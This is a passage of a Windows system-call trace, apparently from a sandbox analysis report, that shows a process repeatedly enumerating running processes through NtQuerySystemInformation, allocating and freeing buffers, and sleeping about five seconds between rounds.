BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.695] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.713] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.733] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.762] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.807] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.815] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.841] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.843] NtQuerySystemInformation (in: 